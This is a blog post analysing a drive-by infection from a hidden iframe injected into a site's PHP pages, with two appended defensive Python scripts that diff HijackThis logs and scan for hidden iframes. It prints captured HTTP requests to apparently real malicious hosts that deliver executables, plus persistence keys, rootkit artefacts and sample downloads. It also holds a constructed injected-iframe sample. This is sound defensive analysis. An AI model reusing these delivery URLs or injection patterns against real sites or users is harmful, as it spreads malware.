See Website with hidden iframe and Malware Analysis

>> Thursday, November 26, 2009


It all began this morning (16/10/2008) at 13:00, when I checked the HTML code of index.php and saw something suspicious inside:



Our index.php and four other *.php pages were infected with this iframe from 11:00am to 13:00; fortunately we check the code of our site every 2/3 hours, so we removed the infected code immediately.
So I decided to analyze that iframe code, and I used an old, unpatched Internet Explorer 6.0 to be sure of getting infected and having the malware on my system for analysis.
I visited that iframe and after a few seconds a massive malware infection started on my system, with connections to a large number of different IPs.
Here is the result of the sniffed network traffic (I removed some parts because they were too long; you can scroll down to download the complete log):
================================================
Index : 14
Protocol : TCP
Local Address : 192.168.1.5
Remote Address : 59.125.229.71
Local Port : 1045
Remote Port : 80
Local Host :
Remote Host : 59-125-229-71.HINET-IP.hinet.net
Service Name : http
Packets : 11
Data Size : 1.223 Bytes
Total Size : 1.995 Bytes
Capture Time : 16/10/2008 20.57.53:796
==================================================
GET /in.cgi?id111 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: fstat.cn
Connection: Keep-Alive
HTTP/1.1 302 Found
Date: Thu, 16 Oct 2008 18:54:43 GMT
Server: Apache/2
Set-Cookie: SL_id111_0000=_10000_; domain=fstat.cn; path=/; expires=Fri, 17-Oct-2008 18:54:43 GMT
Set-Cookie: TSUSER=id111; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/; domain=fstat.cn
Location: http://mmcounter.com/tds/in.cgi?default
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 162
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html

==================================================
Index : 15
Protocol : TCP
Local Address : 192.168.1.5
Remote Address : 94.102.50.130
Local Port : 1046
Remote Port : 80
Local Host :
Remote Host :
Service Name : http
Packets : 11
Data Size : 1.166 Bytes
Total Size : 1.949 Bytes
Capture Time : 16/10/2008 20.57.58:609
==================================================
GET /tds/in.cgi?default HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: mmcounter.com
Connection: Keep-Alive
HTTP/1.1 302 Found
Date: Thu, 16 Oct 2008 18:56:22 GMT
Server: Apache/2
Set-Cookie: SL_default_0000=_1_; domain=mmcounter.com; path=/; expires=Fri, 17-Oct-2008 18:56:22 GMT
Location: http://lite.ff-freehosting.com/all/index.php
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 165
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html

==================================================
Index : 18
Protocol : TCP
Local Address : 192.168.1.5
Remote Address : 94.102.50.130
Local Port : 1047
Remote Port : 80
Local Host :
Remote Host :
Service Name : http
Packets : 19
Data Size : 8.912 Bytes
Total Size : 10.020 Bytes
Capture Time : 16/10/2008 20.58.03:796
==================================================
GET /all/index.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: lite.ff-freehosting.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 16 Oct 2008 18:56:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate
Expires: Thu, 01 Jan 2000 00:00:00 GMT
Last-Modified: Thu, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 7880
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html

==================================================
Index : 20
Protocol : TCP
Local Address : 192.168.1.5
Remote Address : 66.232.116.2
Local Port : 1051
Remote Port : 80
Local Host :
Remote Host :
Service Name : http
Packets : 395
Data Size : 248.424 Bytes
Total Size : 264.640 Bytes
Capture Time : 16/10/2008 20.58.21:796
==================================================
GET /all/controller.php?action=bot&entity_list=&uid=2&first=1&guid=0&rnd=982735 HTTP/1.1
Host: 66.232.116.2
HTTP/1.1 200 OK
Date: Thu, 16 Oct 2008 18:58:18 GMT
Server: Apache/2.2.8 (EL)
X-Powered-By: PHP/5.2.6
Version: 1
Content-Length: 397312
Entity-Info: 6:71168:2;10:41984:1;38:42496:2;44:57344:2;46:184320:2;
Rnd: 983332
Magic-Number: 32|0|85:214:242:0:116:131:195:213:214:77:222:73
Connection: close
Content-Type: text/html; charset=utf-8

==================================================
Index : 23
Protocol : TCP
Local Address : 192.168.1.5
Remote Address : 94.102.50.130
Local Port : 1053
Remote Port : 80
Local Host :
Remote Host :
Service Name : http
Packets : 34
Data Size : 18.249 Bytes
Total Size : 19.863 Bytes
Capture Time : 16/10/2008 20.58.38:281
==================================================
GET /all/load.php?id=45751&spl=5 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: lite.ff-freehosting.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 16 Oct 2008 18:57:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.6
Accept-Ranges: bytes
Content-Disposition: inline; filename=load.exe
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 17475
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream

==================================================
Index : 25
Protocol : TCP
Local Address : 192.168.1.5
Remote Address : 66.232.116.2
Local Port : 1055
Remote Port : 80
Local Host :
Remote Host :
Service Name : http
Packets : 57
Data Size : 32.344 Bytes
Total Size : 34.968 Bytes
Capture Time : 16/10/2008 20.58.46:234
==================================================
GET /all/controller.php?action=bot&entity_list=&uid=2&first=1&guid=0&rnd=982735 HTTP/1.1
Host: 66.232.116.2
HTTP/1.1 200 OK
Date: Thu, 16 Oct 2008 18:58:42 GMT
Server: Apache/2.2.8 (EL)
X-Powered-By: PHP/5.2.6
Version: 1
Content-Length: 397312
Entity-Info: 6:71168:2;10:41984:1;38:42496:2;44:57344:2;46:184320:2;
Rnd: 983188
Magic-Number: 32|0|185:234:45:115:54:0:22:233:187:219:150
Connection: close
Content-Type: text/html; charset=utf-8

If you want to download the complete log of the sniffed Internet traffic, click on the link below:
Here you can download the saved index.html page of the malware's site that appears in the network sniffer logs (it contains some decryption functions and encrypted code):
index ZIP (password is infected)
While the Internet traffic sniffer was active, the computer was infected with a malware that was downloaded into the Temp folder with the filename winMN448Eewaoz.exe; after this file was executed it hid itself and dropped a file named ~.exe in C:\WINDOWS\system32\, which was downloaded from this GET query:
GET /all/load.php?id=45751&spl=5 HTTP/1.1
Here is the result from our online virus scanner for the malware "~.exe" that was analyzed:
File Info Description
Report Generated: 19.10.2008 at 19.47.59 (GMT 1)
Time for scan: 22 seconds
Filename: ~.exe
File size: 25 KB
MD5 Hash: D0E01992354F6591C4881C838F6988C8
SHA1 Hash: 8F56E93CEE4B4BAEDE3FFAA888E475BD5D55BE33
CRC32: 814955469
Application Type: Executable (EXE) 32bit
Packer detected: Nothing found *
RarSFX Archive: Nothing found
Cabinet Archive: Nothing found
Binder Detector: Nothing found
ASCII Strings: View
Detection Rate: 5 on 23
Antivirus Detections
A-squared Nothing found!
AntiVir Contains detection pattern of the dropper DR/Delphi.Gen
Avast Win32:Trojan-gen {Other} (0)
AVG Virus found Win32/Heur
BitDefender Nothing found!
ClamWin Nothing found!
Comodo Nothing found!
Dr.Web Nothing found!
Ewido Nothing found!
F-PROT 6 Nothing found!
G DATA Nothing found!
IkarusT3 Nothing found!
Kaspersky Trojan.Win32.Buzus.abkg
McAfee Nothing found!
NOD32 v3 Nothing found!
Norman Nothing found!
Panda Nothing found!
QuickHeal Nothing found!
Solo Antivirus Nothing found!
Sophos Nothing found!
TrendMicro Nothing found!
VBA32 Malware-Cryptor.Win32.Xip
VirusBuster Nothing found!

Below is a list of the PE import tables of the malware with filename ~.exe:
+KERNEL32.DLL
GetCurrentThreadId
ExitProcess
RtlUnwind
RaiseException
GetCommandLineA
TlsSetValue
TlsGetValue
LocalAlloc
GetModuleHandleA
FreeLibrary
HeapFree
HeapReAlloc
HeapAlloc
GetProcessHeap
+KERNEL32.DLL
LoadLibraryA
GetProcAddress
+GDI32.DLL
SetPixel
GetPixel
CreateDCA
Here is a short analysis of that malware:
-Downloaded into the Temp folder as winMN448Eewaoz.exe
-Copied to C:\WINDOWS\system32\~.exe
-Injected code into svchost.exe
-Opened remote connections to IP 66.232.116.2 on port 80
After some time other files were downloaded onto my system; here are the complete logs of the network traffic sniffed during the second part of the malware infection:
Download Sniffer Logs Part 2
And now the fun part begins :)
I started Rootkit Unhooker and noticed some suspicious drivers in the Driver List that made me think of possible rootkit activity:
1) 2) 3) [screenshots of the Rootkit Unhooker Driver List; images not preserved]
If you click Properties on the driver column of rnvrnrrv.sys you get this:

Why is it 0 bytes, with no info on creation/modification, etc.? ...
Now let's look at Stealth Code:

Here you can download the dumped files:
Download
Below is how the Hidden Files column looks:

Driver C:\WINDOWS\system32\rnvrnrrv.sys is loaded and hidden from Explorer search (it seems the driver hides every file whose name matches *rnvrnrrv*). Now let's try to search for some info in Regedit:

It is not much, but it is useful info.
Below are the import tables of rnvrnrrv.sys:
+NTOSKRNL.EXE
ExAllocatePoolWithTag
ExFreePoolWithTag
ZwQuerySystemInformation
RtlImageDirectoryEntryToData
memcpy
memset
_except_handler3
Below is some other useful info on a newly created process named mbqlmfin.exe (I am using Process Explorer in the images below):


Here is a list of some files created by the malware (in no particular order):
-C:\WINDOWS\msauc.exe
-C:\WINDOWS\system32\*randomnumber*.cpx
-C:\WINDOWS\system32\*randomnumber*.dat
-C:\WINDOWS\system32\wpv*randomnumber*.cpx
-C:\WINDOWS\system32\msansspc.dll
-%TempFolder%\winMN448Eewaoz.exe
-%ProgramFiles%\xeifh\SetActAdm.dll
-%ProgramFiles%\Internet Explorer\msansspc.dll
-C:\WINDOWS\system32\drivers\rnvrnrrv.sys
-C:\WINDOWS\system32\shell31.dll
-C:\WINDOWS\system32\fqqtiaag.tmp
-C:\WINDOWS\TDEZAALK.exe
-C:\%DocumentsAndSettings%\All Users\%ApplicationData%\almrahwt\mbqlmfin.exe
Below are the PE import tables of the above files:
msauc.exe
+KERNEL32.DLL
GlobalUnlock
OutputDebugStringA
LockResource
SetErrorMode
lstrcmpiA
CompareStringA
ReadFile
FileTimeToSystemTime
SetConsoleCtrlHandler
lstrcatA
IsValidCodePage
GetDriveTypeA
GetCurrentProcessId
+MSVCRT.DLL
_initterm
_strtime
abs
_waccess
__setusermatherr
mbqlmfin.exe
+KERNEL32.DLL
GetFileSize
FindFirstFileW
LoadLibraryA
FindResourceExW
CreateProcessW
FindClose
FindFirstChangeNotificationW
FreeLibrary
InterlockedIncrement
GlobalAlloc
ReadProcessMemory
SuspendThread
SetLastError
GetModuleHandleW
TerminateThread
DeleteFileW
VirtualFree
VirtualAlloc
GetFileAttributesExW
ReadFile
SetFilePointer
CloseHandle
ResetEvent
GetProcAddress
CreateFileW
GetDriveTypeW
GetCurrentProcessId
GetModuleFileNameW
+USER32.DLL
CreateWindowExW
EnableWindow
DefWindowProcW
LoadImageW
GetWindowThreadProcessId
PostQuitMessage
TranslateMessage
GetSysColor
RedrawWindow
RegisterHotKey
SetForegroundWindow
SystemParametersInfoW
LoadIconW
SendDlgItemMessageW
FillRect
RegisterWindowMessageW
ReleaseCapture
RegisterClassExW
PostMessageW
ReleaseDC
DrawTextW
GetCursorPos
DestroyMenu
GetWindowDC
CreatePopupMenu
TDEZAALK.exe
+KERNEL32.DLL
ReadFile
MultiByteToWideChar
GetModuleHandleA
GetFileSize
FlushInstructionCache
GetTickCount
VirtualProtect
GetLastError
GetProcAddress
LocalFree
LoadLibraryA
Sleep
LocalAlloc
+USER32.DLL
wsprintfA
wvsprintfA
+KERNEL32.DLL
VirtualProtect
Below is some strange content from some of the *randomnumber*.cpx files:
[Windows Latin 1(1252)/850 (Multilingual-Latin 1)]
130:44
131:159
132:44
133:95
134:253
135:252
137:37
138:83
139:60
140:79
145:96
146:39
147:34
148:34
150:45
151:95
154:115
155:62
156:111
159:89
160:32
161:173
162:189
163:156
164:207
165:190
166:221
167:245
168:249
169:184
170:166
171:174
172:170
173:240
174:169
175:238

This is similar to the sniffed traffic, such as:

Content-Length: 397312
Entity-Info: 6:71168:2;10:41984:1;38:42496:2;44:57344:2;46:184320:2;
Rnd: 983428
Magic-Number: 512|0|183:173:108:162:10:149:128:204

Below are some registry keys created for startup:
-HKLM\Software\Microsoft\Windows\CurrentVersion\Run\lsass driver
-HKLM\Software\Microsoft\Windows\CurrentVersion\Run\TDEZAALK
-HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\[51m3u05p5i]
Below are the Trend Micro HijackThis logs from before and after the infection:
Before:
Logfile of Trend Micro HijackThis v2.0.0 (BETA)
Scan saved at 23.54.15, on 16/10/2008
Platform: Windows XP SP2
Boot mode: Normal
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\ctfmon.exe
C:\WINDOWS\system32\wscntfy.exe
C:\WINDOWS\system32\wuauclt.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Documents and Settings\Laboratorio06\Desktop\HijackThis 2.00 beta\HiJackThis_v2.exe
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page =
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
R3 - Default URLSearchHook is missing
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O22 - SharedTaskScheduler: Precaricatore Browseui - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\system32\browseui.dll
O22 - SharedTaskScheduler: Daemon di cache delle categorie di componenti - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINDOWS\system32\browseui.dll

After:
Logfile of Trend Micro HijackThis v2.0.0 (BETA)
Scan saved at 0.09.55, on 17/10/2008
Platform: Windows XP SP2
Boot mode: Normal
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\ctfmon.exe
C:\WINDOWS\system32\wscntfy.exe
C:\WINDOWS\system32\wuauclt.exe
C:\WINDOWS\system32\wpv286.cpx
C:\WINDOWS\system32\svchost.exe
C:\Documents and Settings\All Users\Dati applicazioni\almrahwt\mbqlmfin.exe
C:\Documents and Settings\Laboratorio06\Desktop\HijackThis 2.00 beta\HiJackThis_v2.exe
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page =
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
R3 - Default URLSearchHook is missing
O4 - HKLM\..\Run: [lsass driver] C:\WINDOWS\msauc.exe
O4 - HKLM\..\Run: [TDEZAALK] %systemroot%\TDEZAALK.exe
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O4 - HKLM\..\Policies\Explorer\Run: [51m3u05p5i] C:\Documents and Settings\All Users\Dati applicazioni\almrahwt\mbqlmfin.exe
O21 - SSODL: SetActAdm - {002069A6-342F-036E-4AAB-03598A9EEFCE} - C:\Programmi\xeifh\SetActAdm.dll (file missing)
O22 - SharedTaskScheduler: Precaricatore Browseui - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\system32\browseui.dll
O22 - SharedTaskScheduler: Daemon di cache delle categorie di componenti - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINDOWS\system32\browseui.dll
O23 - Service: MS Software Shadow Copy Provider SwPrvSchedule (SwPrvSchedule) - Unknown owner - C:\WINDOWS\system32\wpv5338.cpx.exe (file missing)
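The registry keys listed above and the two HijackThis logs are the same evidence seen two ways, and the quickest way to read them is to diff the before and after logs. Here is an added Python script of mine (not part of the original post and not a HijackThis feature) that does that: it counts the running processes, collects the R/F/N/O entries, and reports what only the second log contains, plus any entry HijackThis marked "(file missing)". The embedded logs are shortened copies of the two logs above; every line that differs between them is kept.

```python
"""Diff a 'before' and an 'after' HijackThis log: report processes that
appear (or appear more often) only after infection, autostart/hook entries
that are new, and entries HijackThis marked '(file missing)'."""
import re
from collections import Counter
from typing import Dict, Set, Tuple

# Shortened copies of the two logs above (platform lines and some processes
# omitted; every entry that differs between the two logs is kept).
BEFORE = r"""Logfile of Trend Micro HijackThis v2.0.0 (BETA)
Scan saved at 23.54.15, on 16/10/2008
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\ctfmon.exe
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page =
R3 - Default URLSearchHook is missing
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O22 - SharedTaskScheduler: Precaricatore Browseui - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\system32\browseui.dll
"""

AFTER = r"""Logfile of Trend Micro HijackThis v2.0.0 (BETA)
Scan saved at 0.09.55, on 17/10/2008
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\ctfmon.exe
C:\WINDOWS\system32\wpv286.cpx
C:\WINDOWS\system32\svchost.exe
C:\Documents and Settings\All Users\Dati applicazioni\almrahwt\mbqlmfin.exe
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page =
R3 - Default URLSearchHook is missing
O4 - HKLM\..\Run: [lsass driver] C:\WINDOWS\msauc.exe
O4 - HKLM\..\Run: [TDEZAALK] %systemroot%\TDEZAALK.exe
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O4 - HKLM\..\Policies\Explorer\Run: [51m3u05p5i] C:\Documents and Settings\All Users\Dati applicazioni\almrahwt\mbqlmfin.exe
O21 - SSODL: SetActAdm - {002069A6-342F-036E-4AAB-03598A9EEFCE} - C:\Programmi\xeifh\SetActAdm.dll (file missing)
O22 - SharedTaskScheduler: Precaricatore Browseui - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\system32\browseui.dll
O23 - Service: MS Software Shadow Copy Provider SwPrvSchedule (SwPrvSchedule) - Unknown owner - C:\WINDOWS\system32\wpv5338.cpx.exe (file missing)
"""

ENTRY = re.compile(r"^[RFNO]\d+ - ")       # R0-R3, F0-F3, N1-N4, O1-O24 lines


def parse_hjt(log: str) -> Tuple[Counter, Set[str]]:
    """Return (process path counts, set of entry lines) from one log."""
    processes: Counter = Counter()
    entries: Set[str] = set()
    in_procs = False
    for line in log.splitlines():
        line = line.strip()
        if not line:
            continue
        if line == "Running processes:":
            in_procs = True
        elif ENTRY.match(line):
            in_procs = False
            entries.add(line)
        elif in_procs:
            processes[line.lower()] += 1        # Windows paths are case-insensitive
    return processes, entries


def diff_logs(before: str, after: str) -> Dict[str, object]:
    p0, e0 = parse_hjt(before)
    p1, e1 = parse_hjt(after)
    return {
        # extra instances per path, e.g. one more svchost.exe than before
        "new_processes": {p: p1[p] - p0[p] for p in p1 if p1[p] > p0[p]},
        "new_entries": sorted(e1 - e0),
        "removed_entries": sorted(e0 - e1),
        "missing_files": sorted(e for e in e1 if "(file missing)" in e),
    }


if __name__ == "__main__":
    result = diff_logs(BEFORE, AFTER)
    for section, items in result.items():
        print(section)
        for item in (items.items() if isinstance(items, dict) else items):
            print("   ", item)
```

Counting processes instead of just collecting their names is what makes the extra svchost.exe visible: the injected copy noted in the analysis above has the same path as the legitimate ones and would disappear in a plain set difference.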

What can we learn from this analysis?
1) Always use an up-to-date browser
2) Always use an antivirus and a firewall
3) Check the HTML code of your site frequently
4) Inform the site admin if you notice something suspicious in the HTML code
5) How to detect possible rootkit activity in your system
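Lesson 3 is the one that can be automated. Here is an added Python script of mine (not the post's own code) that walks a web root and reports iframes hidden from the visitor by zero size, display:none / visibility:hidden, or off-screen positioning, which are the attributes injected frames of this kind typically carry. The sample page at the bottom is constructed, and the hostnames in it are placeholders, not the ones from the capture above.

```python
"""Find iframes that are hidden from the visitor in HTML/PHP source files.
Run find_hidden_iframes() on one document or scan_tree() on a web root."""
import re
from html.parser import HTMLParser
from pathlib import Path
from typing import Dict, List

# PHP blocks are stripped before parsing (their '>' characters confuse an
# HTML parser); their newlines are kept so reported line numbers stay right.
PHP_BLOCK = re.compile(r"<\?(?:php)?.*?\?>", re.S)
OFFSCREEN = re.compile(r"(?:left|top):-\d{3,}")


class HiddenIframeFinder(HTMLParser):
    def __init__(self) -> None:
        super().__init__()
        self.findings: List[Dict[str, object]] = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        style = re.sub(r"\s+", "", a.get("style", "")).lower()
        reasons = []
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("style hides the frame")
        if OFFSCREEN.search(style):
            reasons.append("positioned off-screen")
        for dim in ("width", "height"):
            val = a.get(dim, "").strip().lower()
            val = val[:-2] if val.endswith("px") else val
            if val.isdigit() and int(val) <= 1:
                reasons.append(f"{dim}={val}")
        if reasons:
            self.findings.append({"line": self.getpos()[0],
                                  "src": a.get("src", ""),
                                  "reasons": reasons})


def find_hidden_iframes(source: str) -> List[Dict[str, object]]:
    """Findings (line, src, reasons) for one HTML or PHP document."""
    cleaned = PHP_BLOCK.sub(lambda m: "\n" * m.group(0).count("\n"), source)
    parser = HiddenIframeFinder()
    parser.feed(cleaned)
    parser.close()
    return parser.findings


def scan_tree(root: str, suffixes=(".php", ".html", ".htm")) -> Dict[str, list]:
    """Map file path -> findings for every matching file under root."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            hits = find_hidden_iframes(path.read_text(errors="replace"))
            if hits:
                report[str(path)] = hits
    return report


# Constructed sample page: one legitimate frame and one injected frame.
# The hostnames are placeholders, not the ones from the capture.
SAMPLE_PAGE = """<?php include 'header.php'; ?>
<html><body>
<h1>Home</h1>
<iframe src="http://video.example.invalid/player" width="640" height="360"></iframe>
<iframe src="http://redirector.example.invalid/in.cgi?id111" width=0 height=0
        style="visibility: hidden; display:none"></iframe>
</body></html>
"""

if __name__ == "__main__":
    for hit in find_hidden_iframes(SAMPLE_PAGE):
        print(f"line {hit['line']}: {hit['src']} ({', '.join(hit['reasons'])})")
```

Run scan_tree("/var/www") from cron every couple of hours, which is the interval used on the site in this post, and mail the report when it is non-empty; because the checks are attribute-based they also catch a frame whose src has been obfuscated, as long as the tag itself is still in the source.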
Robert


